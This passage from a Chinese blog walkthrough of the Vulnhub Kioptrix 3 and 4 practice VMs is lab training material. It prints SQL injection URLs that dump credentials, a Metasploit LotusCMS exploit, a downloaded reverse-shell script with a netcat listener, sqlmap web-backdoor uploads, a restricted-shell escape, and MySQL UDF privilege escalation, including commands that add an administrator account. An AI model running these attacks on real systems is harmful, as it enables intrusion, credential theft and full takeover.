</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>得到当前数据库和版本号</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>得到当前数据库所有的表名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>获取表里的列名。</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS 漏洞</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</pre><p>从查询结果看,有一个本地文件包含和一个远程代码执行,</p><p>这里的本地文件包含就是我们之前发现的那个。我们尝试下这个本地文件包含漏洞</p><p>尝试发现这个漏洞好像不行。</p><p>尝试<code>LotusCMS 3.0 - 'eval()' Remote Command Execution</code> 发现是一个rb文件。</p><p>于是</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS
 
Matching Modules
================
 
   Name                              Disclosure Date  Rank       Description
   ----                              ---------------  ----       -----------
   exploit/multi/http/lcms_php_exec  2011-03-03       excellent  LotusCMS 3.0 eval() Remote Command Execution
 
</pre><p>利用这个漏洞进行攻击</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use exploit/multi/http/lcms_php_exec 
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /lcms/           yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.58
RHOST => 192.168.43.58
msf exploit(multi/http/lcms_php_exec) > set PAYLOAD generic/shell_bind_tcp 
PAYLOAD => generic/shell_bind_tcp
msf exploit(multi/http/lcms_php_exec) > set URI /
URi => /
msf exploit(multi/http/lcms_php_exec) > show options 
 
Module options (exploit/multi/http/lcms_php_exec):
 
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST    192.168.43.58    yes       The target address
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   URI      /                yes       URI
   VHOST                     no        HTTP server virtual host
 
 
Payload options (generic/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.58    no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Automatic LotusCMS 3.0
 
 
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[-] Exploit failed [unreachable]: Rex::HostUnreachable The host (192.168.43.58:80) was unreachable.
[*] Exploit completed, but no session was created.
msf exploit(multi/http/lcms_php_exec) > set RHOST 192.168.43.158
RHOST => 192.168.43.158
msf exploit(multi/http/lcms_php_exec) > run 
 
[*] Started bind handler
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (192.168.43.177:44505 -> 192.168.43.158:4444) at 2018-05-08 10:02:56 -0400
 
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
ls
cache
core
data
favicon.ico
gallery
gnu-lgpl.txt
index.php
modules
style
update.php
pwd 
/home/www/kioptrix3.com
</pre><p>我尝试用<code>cd</code>命令进入<code>gallery</code>目录但是不行,</p><p>这里用到<code>ls -l</code>可以看到<code>gallery</code>目录的文件</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">ls -l gallery
total 156
drwxr-xr-x 2 root root  4096 Apr 12  2011 BACK
-rw-r--r-- 1 root root  3573 Oct 10  2009 db.sql
-rw-r--r-- 1 root root   252 Apr 12  2011 g.php
drwxr-xr-x 3 root root  4096 Apr 12  2011 gadmin
-rw-r--r-- 1 root root   214 Apr 12  2011 gallery.php
-rw-r--r-- 1 root root  1440 Apr 14  2011 gconfig.php
-rw-r--r-- 1 root root   297 Apr 12  2011 gfooter.php
-rw-r--r-- 1 root root 38771 Apr 12  2011 gfunctions.php
-rw-r--r-- 1 root root  1009 Apr 12  2011 gheader.php
-rw-r--r-- 1 root root   249 Apr 12  2011 index.php
-rw-r--r-- 1 root root 10340 Apr 12  2011 install.BAK
-rw-r--r-- 1 root root   212 Apr 12  2011 login.php
-rw-r--r-- 1 root root   213 Apr 12  2011 logout.php
-rw-r--r-- 1 root root   249 Apr 12  2011 p.php
drwxrwxrwx 2 root root  4096 Apr 12  2011 photos
-rw-r--r-- 1 root root   213 Apr 12  2011 photos.php
-rw-r--r-- 1 root root   219 Apr 12  2011 post_comment.php
-rw-r--r-- 1 root root   214 Apr 12  2011 profile.php
-rw-r--r-- 1 root root    87 Oct 10  2009 readme.html
-rw-r--r-- 1 root root   213 Apr 12  2011 recent.php
-rw-r--r-- 1 root root   215 Apr 12  2011 register.php
drwxr-xr-x 2 root root  4096 Apr 13  2011 scopbin
-rw-r--r-- 1 root root   213 Apr 12  2011 search.php
-rw-r--r-- 1 root root   216 Apr 12  2011 slideshow.php
-rw-r--r-- 1 root root   211 Apr 12  2011 tags.php
drwxr-xr-x 6 root root  4096 Apr 12  2011 themes
-rw-r--r-- 1 root root    56 Oct 10  2009 version.txt
-rw-r--r-- 1 root root   211 Apr 12  2011 vote.php
</pre><p>发现<code>gconfig.php</code>配置文件,<code>cat</code>读配置文件。</p><pre class="md-fences mock-cm md-end-block" lang="">  $GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
 
    $GLOBALS["gallarific_mysql_server"] = "localhost";
    $GLOBALS["gallarific_mysql_database"] = "gallery";
    $GLOBALS["gallarific_mysql_username"] = "root";
    $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
 
</pre><h3><a name='header-n10339' class='md-header-anchor '></a>lotusRCE.sh</h3><pre class="md-fences mock-cm md-end-block" lang="">wget https://raw.githubusercontent.com/Hood3dRob1n/LotusCMS-Exploit/master/lotusRCE.sh
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# chmod +x lotusRCE.sh
root@kali:~# ./lotusRCE.sh 192.168.43.158
 
Path found, now to check for vuln....
 
</html>Hood3dRob1n
Regex found, site is vulnerable to PHP Code Injection!
 
About to try and inject reverse shell....
what IP to use?
192.168.43.177
What PORT?
2333
 
OK, open your local listener and choose the method for back connect: 
1) NetCat -e        3) NetCat Backpipe  5) Exit
2) NetCat /dev/tcp  4) NetCat FIFO
#? 1
 
</pre><pre class="md-fences mock-cm md-end-block" lang="">root@kali:/tmp# nc -lvp 2333
listening on [any] 2333 ...
connect to [192.168.43.177] from kioptrix3.com [192.168.43.158] 56259
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
</pre><h2><a name='header-n10344' class='md-header-anchor '></a>权限提升</h2><p>尝试用之前SQL注入得到的。</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery                                                                              
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>进行SSH连接,发现第一个账号不能没有多大的作用,不能提权。</p><p>连接第二个账号</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$ ls
checksec.sh  CompanyPolicy.README
</pre><p>存在一个<code>CompanyPolicy.README</code>文件.</p><pre class="md-fences mock-cm md-end-block" lang="">checksec.sh  CompanyPolicy.README
loneferret@Kioptrix3:~$ cat CompanyPolicy.README 
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
 
DG
CEO
</pre><p>英语比较垃圾,百度翻译的意思是可以通过<code>sudo ht</code>对文件进行编辑,创建。</p><p>在kali下尝试</p><pre class="md-fences mock-cm md-end-block" lang="">loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
</pre><p>报错不能打开一个<code>xterm-256color.</code>终端。</p><p>回到本地环境用<code>xshell</code>连接是可以打开的</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_13.png' alt='' referrerPolicy='no-referrer' /></p><p>此时按<code>F3</code>,可以输入<code>/etc/passwd</code>或者<code>/etc/sudoers</code>文件来进行文件编辑</p><p>把/etc/passwd当前用户的权限修改和<code>root</code>一样即可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_14.png' alt='' referrerPolicy='no-referrer' /></p><p>也可以把/etc/sudoers当前用户的权限修改和<code>root</code>一样即可。
<img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_15.png' alt='' referrerPolicy='no-referrer' /></p><p>重新登录SSH。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh loneferret@192.168.43.158
loneferret@192.168.43.158's password: 
Last login: Tue May  8 19:27:01 2018 from uknow-pc
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
 
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
 
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
 
To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
root@Kioptrix3:~# id
uid=0(root) gid=0(root) groups=0(root),100(users)
root@Kioptrix3:~# whoami
root
</pre><p>此时已经是<code>root</code>权限了。</p><h2><a name='header-n10381' class='md-header-anchor '></a>总结</h2><p>这次实验过程挺长的,发现了很多地方的问题,第一是发现了<code>phpmyadmin</code>我尝试用写日志的方法试试能不能拿到shell。但是发现<code>phpmyadmin</code>变量了不存在<code>general log</code>变量。</p><p>另外就是这里有个SQL注入,可以用<code>sqlmap</code>跑出来,是<code>root</code>权限。尝试用<code>os-shell</code>写shell。通过了之前用远程命令执行得到的绝对路径,但是还是无法写入。好像是目录权限的问题。</p><p>在<code>phpmyadmin</code>下也无法执行<code>INTO OUTFILE</code>函数。显示<code>#1 - Can't create/write to file</code>。从在命令执行里也看得出来目录是没有权限的。</p><p>在最后补充了一个文件包含和后台上传的利用,这个组合通过文件包含执行图片木马,得到一个shell。虽然说很鸡肋,还是感觉有点厉害的。</p><p>在实验过程中还是想多多尝试多种方法的,但是实验环境还是有限。但在这次实验中还是学到了很多,做了几次<code>vulnhub</code>的实验了,感觉提权方面还是有学习到很多。</p><p>虽然说这些环境有点不常见甚至奇葩,但是还是在这个过程中学到了<code>linux</code>环境下的一些之前一直匮乏的知识。</p><p> </p><h1><a name='header-n10396' class='md-header-anchor '></a>第十六节 Vulnhub渗透测试练习-Kioptrix 4</h1><hr /><p>title: Vulnhub渗透测试练习-Kioptrix 4
date: 2018-05-17 13:46:30
tags:</p><h2><a name='header-n10399' class='md-header-anchor '></a>作者:Ukonw</h2><p> </p><h3><a name='header-n10405' class='md-header-anchor '></a>信息收集</h3><p>用<code>nmap</code>进行端口扫描。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -sS -A 10.32.58.187
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-17 01:57 EDT
Nmap scan report for 10.32.58.187
Host is up (0.00037s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
|_clock-skew: mean: 10h00m00s, deviation: 2h49m43s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2018-05-17T09:58:07-04:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.37 ms 10.32.58.187
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
</pre><p>从扫描结果可以得到,开发以下端口信息</p><ul><li>22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
    139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
    445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)</li></ul><p>访问80端口下的WEB服务。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_1.png' alt='' referrerPolicy='no-referrer' /></p><p>尝试万能密码绕过<code>'or 1=1#</code> 绕过失败。</p><p>弱密码<code>admin:admin</code>也是错误的。</p><p>尝试<code>admin:'</code>,出现报错。好爆出来了路径<code>/var/www/checklogin.php</code>。</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix4_2.png' alt='' referrerPolicy='no-referrer' /></p><p>存在POST型注入。</p><h2><a name='header-n10433' class='md-header-anchor '></a>漏洞利用</h2><h3><a name='header-n10434' class='md-header-anchor '></a>sqlmap进行SQL注入</h3><p><code>sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --current-user --current-db --is-dba</code></p><p>在注入的过程会遇到<code>302跳转</code>选择<code>n</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:00:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:00:45] [INFO] fetching current user
[02:00:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:00:45] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[02:00:45] [INFO] fetching current database
[02:00:45] [INFO] retrieved: members
current database:    'members'
[02:00:45] [INFO] testing if current user is DBA
[02:00:45] [INFO] fetching current user
current user is DBA:    True
[02:00:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.32.58.187'
 
[*] shutting down at 02:00:45
</pre><p>通过注入得到用户名和密码</p><pre class="md-fences mock-cm md-end-block" lang="">Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+
 
</pre><p>通过<code>--os-shell</code>写入一个<code>webshell</code>。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# sqlmap -u http://10.32.58.187/checklogin.php --data="myusername=admin&mypassword=123&Submit=Login" -p mypassword --os-shell
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 
[*] starting at 02:09:06
 
[02:09:06] [INFO] resuming back-end DBMS 'mysql' 
[02:09:06] [INFO] testing connection to the target URL
[02:09:06] [INFO] heuristics detected web page charset 'ascii'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: myusername=admin&mypassword=-8260' OR 6555=6555#&Submit=Login
 
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: myusername=admin&mypassword=123' OR SLEEP(5)-- UeQF&Submit=Login
---
[02:09:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:09:06] [INFO] going to use a web backdoor for command prompt
[02:09:06] [INFO] fingerprinting the back-end DBMS operating system
[02:09:06] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[02:09:08] [INFO] retrieved the web server document root: '/var/www'
[02:09:08] [INFO] retrieved web server absolute paths: '/var/www/checklogin.php'
[02:09:08] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method
[02:09:08] [INFO] the file stager has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpuadle.php
[02:09:08] [WARNING] unable to upload the file through the web file stager to '/var/www/'
[02:09:08] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] 
[02:09:09] [INFO] the backdoor has been successfully uploaded on '/var/www/' - http://10.32.58.187:80/tmpbcphh.php
[02:09:09] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> id
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> whoami
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:    'www-data'
os-shell> cat checklogin.php
do you want to retrieve the command standard output? [Y/n/a] 
command standard output:
---
<?php
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name
</pre><p>但是权限很小。但是得到了数据库的账号密码。</p><h3><a name='header-n10448' class='md-header-anchor '></a>通过SSH连接</h3><p>利用SQL注入得到的用户名密码SSH登录。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# ssh john@10.32.58.187
The authenticity of host '10.32.58.187 (10.32.58.187)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.32.58.187' (RSA) to the list of known hosts.
john@10.32.58.187's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ help help
Limited Shell (lshell) limited help.
Cheers.
</pre><p>从这里我们可以利用的命令有</p><pre class="md-fences mock-cm md-end-block" lang="">cd  clear  echo  exit  help  ll  lpath  ls
</pre><p>重点其中有一个是<code>echo</code>。</p><p>我们可以利用他得到一个<code>bash交互shell</code></p><pre class="md-fences mock-cm md-end-block" lang="">john:~$ echo os.system('/bin/bash')     
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
</pre><p>权限还是当前用户的权限。</p><h3><a name='header-n10463' class='md-header-anchor '></a>MySQL数据库提权</h3><p>利用SQL注入得到的数据库账号密码登录MySQL数据库。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">john@Kioptrix4:~$ mysql -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 3520
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)
 
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
 
mysql> status;
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2
 
Connection id:      3520
Current database:   
Current user:       root@localhost
SSL:            Not in use
Current pager:      stdout
Using outfile:      ''
Using delimiter:    ;
Server version:     5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:   10
Connection:     Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:        /var/run/mysqld/mysqld.sock
Uptime:         1 hour 10 min 47 sec
</pre><p>尝试<code>mysql udf 提权</code>。</p><p>在Windows环境下,执行命令</p><pre class="md-fences mock-cm md-end-block" lang="">USE mysql;
CREATE TABLE npn(line blob);
INSERT INTO npn values(load_file('C://xampplite//htdocs//mail//lib_mysqludf_sys.dll'));
SELECT * FROM mysql.npn INTO DUMPFILE 'c://windows//system32//lib_mysqludf_sys_32.dll';
CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys_32.dll';
SELECT sys_exec("net user npn npn12345678 /add");
SELECT sys_exec("net localgroup Administrators npn /add");
</pre><p>实现提权。</p><p>我们在实验环境下进行Linux环境下的UDF提权操作。</p><p>首先找到<code>lib_mysqludf_sys.so</code>的目录。</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
</pre><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed
mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so';
ERROR 1125 (HY000): Function 'sys_exec' already exists
mysql> select sys_exec('id > /tmp/out; chown john.john /tmp/out');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+-----------------------------------------------------+
| sys_exec('id > /tmp/out; chown john.john /tmp/out') |
+-----------------------------------------------------+
| NULL                                                | 
+-----------------------------------------------------+
1 row in set (0.00 sec)
 
mysql> quit
Bye
john@Kioptrix4:~$ cat /tmp/out
uid=0(root) gid=0(root)
</pre><p>这样就将<code>sys_exec()</code>函数执行的结果写入到了<code>/tmp/out</code>下。</p><p>得知可以得到root权限。</p><p>可以写一个c语言程序进行命令执行</p><pre class="md-fences mock-cm md-end-block" lang="">#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main(void)
{
setuid(0); setgid(0); system(“/bin/bash”);
}
</pre><p>本地编译上传到目标靶机。</p><p>这里我用wget下载好像一下连接超时。可能是防火墙阻止流量。</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">mysql> SELECT sys_exec('usermod -a -G admin');
ERROR 2013 (HY000): Lost connection to MySQL server during query
mysql> SELECT sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql
 
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.07 sec)
 
</pre><p>利用<code>SELECT sys_exec('usermod -a -G admin');</code>将<code>john</code>加入管理员组</p><pre class="md-fences mock-cm md-end-block" lang="">john@Kioptrix4:/tmp$ sudo su
[sudo] password for john: 
root@Kioptrix4:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/tmp# whoami
root
</pre><p>这样我们得到了root权限。</p></div>
</body>
</html>

  

 

posted @ 2019-07-25 15:21  xyongsec  阅读(7449)  评论(0编辑  收藏  举报